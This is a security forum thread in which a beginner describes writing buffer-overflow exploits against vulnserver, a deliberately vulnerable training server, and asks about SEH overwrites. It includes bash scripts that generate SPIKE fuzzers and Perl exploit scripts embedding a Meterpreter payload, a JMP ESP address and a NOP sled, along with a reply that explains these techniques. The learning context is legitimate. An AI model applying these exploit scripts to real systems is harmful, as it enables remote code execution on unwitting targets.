Jump to content

Vulnserver And Ollydbg, I Need Some Help With Seh Chains


redcodefinal

Recommended Posts

Hi there, I'm new and wanted to introduce myself.

I am redcodefinal, I am 18 and live in California.

Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote 1 exploit for it but, I was hoping that someone could point me in the right direction for a couple other exploitation methods that I am having trouble with. I will make these questions red so it's easier to find.

I'll start by telling you what I learned so that way there is no miscommunication.

First off, we use spike, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy)

#! /bin/bash
echo "Creates a fuzzer script for spike"
echo "Usage: ./createfuzzscipt.sh [file] [command]"
if [ $# -ne 2 ]
	then
	  echo "WRONG ARGS!"

else
	touch $1
	echo "s_readline();" > $1
	echo "s_string(\"$2 \");" >> $1
	echo "s_string_variable(\"COMMAND\");" >> $1

	cat $1

	echo "Happy Fuzzing"
fi

Pretty simple so far. So next we fuzz the target command using spike's general_send_tcp program. If it crashes it is possible that it is vulnerable to attack. We use wireshark to trace back the packets, vulnserver tells you if the command complete successfully or not. We look for TCP streams that don't have that at the end. I was doing this for the TRUN command which happens to crash around 5000 bytes.

Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)

#! /bin/bash
echo "This script will generate a Perl scrip used for general fuzzing"
echo "Be nice to it, it's still in it\'s beta stages"
echo "USAGE: ./createplfuzz.sh [file]"
echo " " 
echo "What do you want the header to be?"
read header
echo "How big should the junk size be?"
read junksize
echo "IP address? (Say \$ARGV[0] to make it ask)"
read ip
echo "Port? (Say \$ARGV[1] to make it ask)"
read port

echo "Beginning Perl Script Maker"

echo '#! /usr/bin/perl' > $1
echo 'use IO::Socket;' >> $1
echo "\$header = \"$header\";" >> $1
junk=`/pentest/exploits/framework/tools/pattern_create.rb $junksize`
echo "\$junk = \"$junk\";" >> $1
echo '$socket = IO::Socket::INET->new(' >> $1
echo 'Proto => "tcp",' >> $1
echo "PeerAddr => \"$ip\"," >> $1
echo "PeerPort => \"$port\"," >> $1
echo ');' >> $1
echo '$socket->recv($serverdata, 1024);' >> $1
echo 'print $serverdata;' >> $1
echo "\$socket->send(\$header.\$junk);" >> $1	

echo "DONE!"
cat $1
chmod +x $1
echo "Happy Fuzzing"

So basically a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open ollyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program, I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command.)

I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

Next we write our exploit.

Basically we just fill in that 2003 character space with junk values (For debigging purposes I just use 'A' (\x41))

Next we grab a JMP ESP command from a dll it loads. The reason we do this is because most dlls won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into Little Endian format. I understand what Little Endian format is but, I don't understand why we need to pack the value like that. The line is

$eip = pack('V', "0x625011af)

Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here. The script is at the end of this section)

Next we make a NOP sled. I understand why we use it, however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (He used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire.

$socket->send($header.$junk.$eip.$nop.$shellcode);

Here is the Perl Exploit generation script.

#! /bin/bash
echo "This script will generate a Perl script used for exploit dev and testing"
echo "Be nice to it, it's still in it's beta stages"
echo "USAGE: ./createplexploit.sh [file]"
echo " " 
echo "What do you want the header to be?"
read header
echo "How big should the junk size be?"
read junksize
echo "What is the EIP value?"
read eip
echo "How many NOPs should the sled contain?"
read nop
echo "What payload should we use?"
read payload
echo "What encoder should we use?"
read encoder
echo "What options do we want for the payload (You should know these"
read ploptions
echo "IP address? (Say \$ARGV[0] to make it ask)"
read ip
echo "Port? (Say \$ARGV[1] to make it ask)"
read port

echo "Beginning Perl Script Maker"

echo '#! /usr/bin/perl' > $1
echo 'use IO::Socket;' >> $1
echo "\$header = \"$header\";" >> $1
echo "\$junk = \"\\x41\" x $junksize;" >> $1
echo "\$eip = pack('V', $eip);" >> $1
echo "\$nop = \"\\x90\" x $nop;" >> $1
shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'`
echo "\$shellcode = $shellcode" >> $1
echo '$socket = IO::Socket::INET->new(' >> $1
echo 'Proto => "tcp",' >> $1
echo "PeerAddr => \"$ip\"," >> $1
echo "PeerPort => \"$port\"," >> $1
echo ');' >> $1
echo '$socket->recv($serverdata, 1024);' >> $1
echo 'print $serverdata;' >> $1
echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> $1	

echo "DONE!"
cat $1
chmod +x $1
echo "Happy Exploiting"

So the exploit works fine. Next, I wanted to try to make my own, however I hit some roadblocks. The command I tried to use was GMON, KSTET, and GTER. All crashed when I used spike fuzzer. However I run into the same problem with each of them. Each one has an extremely small junk space. (GMON was untraceable, I don't think it's overwriting EIP, KSTET only had 66 bytes, GTER only has 147 bytes) I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) to the beginning and end of the shell code. It would hit the first one but, not the 2nd. Later I just changed the shell code in my script to \x42 x 1000, I noticed not all of the Bs showed up. I know there is a couple tricks to making shellcode execute from a different location but, the one would prefer to use is over writing the SEH chains, the SEH Chains are an error handling address that gets called when the program crashes, the SEH Chains in vulnserver point to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

List of questions;


  • How does the JMP ESP address from a non-ASLR dll help use execute shellcode?
  • Why do we need to pack the EIP address in little endian format?
  • How do we know how many NOPs to use in our sled?
  • What is the proper method for over writing SEH and hiding our shellcode somewhere else?

Link to comment
Share on other sites


  • How does the JMP ESP address from a non-ASLR dll help use execute shellcode?
  • Why do we need to pack the EIP address in little endian format?
  • How do we know how many NOPs to use in our sled?
  • What is the proper method for over writing SEH and hiding our shellcode somewhere else?

Welcome! Sorry for a short reply, I have over 9000 reasons why it's not awesome but hopefully it can get you over a hurdle.

1. How does the JMP ESP address from a non-ASLR dll help use execute shellcode?

If your payload is at the top of the stack (esp), then a jmp esp will direct execution to your payload.

2. Why do we need to pack the EIP address in little endian format?

In x86, all data types bigger than a word are expressed in little endian.

3. How do we know how many NOPs to use in our sled?

Use pattern_create.rb and pattern_offset.rb to find total size, subtract out payload and anything else you need to overwrite (addresses, etc). Just arithmetic.

4. What is the proper method for over writing SEH and hiding our shellcode somewhere else?

Check out both parts of section 3 of the Corelan win32 exploit series:

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Sorry I don't have time to go more into detail, but you seem like a self-starter so I think you'll be alright :] Best of luck, and I wish you shells a-plenty.

Link to comment
Share on other sites

Welcome! Sorry for a short reply, I have over 9000 reasons why it's not awesome but hopefully it can get you over a hurdle.

1. How does the JMP ESP address from a non-ASLR dll help use execute shellcode?

If your payload is at the top of the stack (esp), then a jmp esp will direct execution to your payload.

2. Why do we need to pack the EIP address in little endian format?

In x86, all data types bigger than a word are expressed in little endian.

3. How do we know how many NOPs to use in our sled?

Use pattern_create.rb and pattern_offset.rb to find total size, subtract out payload and anything else you need to overwrite (addresses, etc). Just arithmetic.

4. What is the proper method for over writing SEH and hiding our shellcode somewhere else?

Check out both parts of section 3 of the Corelan win32 exploit series:

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Sorry I don't have time to go more into detail, but you seem like a self-starter so I think you'll be alright :] Best of luck, and I wish you shells a-plenty.

Thank you very much! I went looking and the same guy who wrote some tutorials I sued before made one on SEH, it's the same dude who made vulnserver.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...